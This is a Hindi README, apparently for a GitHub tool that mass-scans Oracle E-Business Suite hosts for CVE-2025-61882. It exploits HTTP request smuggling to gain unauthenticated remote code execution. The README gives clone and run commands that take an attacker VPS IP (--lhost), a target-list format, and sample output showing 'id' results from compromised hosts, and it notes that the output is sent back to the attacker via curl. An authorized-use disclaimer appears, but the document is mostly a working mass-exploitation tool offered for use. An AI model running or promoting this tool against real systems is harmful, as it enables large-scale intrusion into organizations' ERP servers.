
मल्टी-थ्रेडेड स्कैनर CVE-2025-61882 के लिए Oracle E-Business Suite में, HTTP रिक्वेस्ट स्मगलिंग का शोषण करके बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करता है और कमांड आउटपुट के माध्यम से सत्यापित करता है।
Oracle E-Business Suite इंस्टॉलेशन में CVE-2025-61882 का पता लगाने के लिए एक तेज़, मल्टी-थ्रेडेड बल्क स्कैनर। यह गंभीर कमजोरी अनधिकृत रिमोट कोड निष्पादन की अनुमति देती है।
id कमांड निष्पादित करके और आउटपुट पार्स करके RCE को मान्य करता हैvuln-output.txt में लिखे जाते हैंpip install requests
बस इतना ही। केवल Python 3.7+ और requests लाइब्रेरी।
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
प्रत्येक पंक्ति में एक URL के साथ targets.txt फ़ाइल बनाएं:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
परिणाम vuln-output.txt में सहेजे जाते हैं:
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id कमांड निष्पादित करता है और curl के माध्यम से आउटपुट वापस भेजता हैuid=...gid=... पैटर्न की जांच करके सफल RCE को मान्य करता हैयह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। हमेशा:
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
कोई बग मिला? कोई फीचर अनुरोध है?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।
इन्फोसेक समुदाय के लिए ❤️ के साथ बनाया गया
| तर्क | आवश्यक | डिफ़ॉल्ट | विवरण |
|---|
--targets | हाँ | - | लक्ष्य URL वाली फ़ाइल का पथ |
--lhost | हाँ | - | आपका VPS/हमलावर IP पता |
--threads | नहीं | 20 | समवर्ती थ्रेड की संख्या |